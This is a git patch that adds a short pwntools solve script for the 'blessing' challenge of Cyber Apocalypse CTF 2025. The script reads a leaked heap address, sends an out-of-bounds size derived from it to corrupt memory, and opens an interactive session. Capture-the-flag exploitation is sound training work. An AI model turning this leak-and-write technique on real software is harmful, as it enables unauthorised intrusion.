From fcf3a9ee0fa661662e3a8b280e8c134cc7495270 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Thu, 27 Mar 2025 23:54:35 +0300
Subject: [PATCH] solve script

---
 .../blessing/a.py                             | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/a.py

diff --git a/cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/a.py b/cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/a.py
new file mode 100644
index 0000000..2b72992
--- /dev/null
+++ b/cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/a.py
@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./blessing", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+
+# leak
+r.recvuntil(b"this: ")
+malloced = int(r.recv(14), 16)
+log.info("malloced: %#x", malloced)
+
+# buf
+r.recvuntil(b"song?")
+s(str(malloced+1).encode())
+s(b"0")
+
+r.interactive()
\ No newline at end of file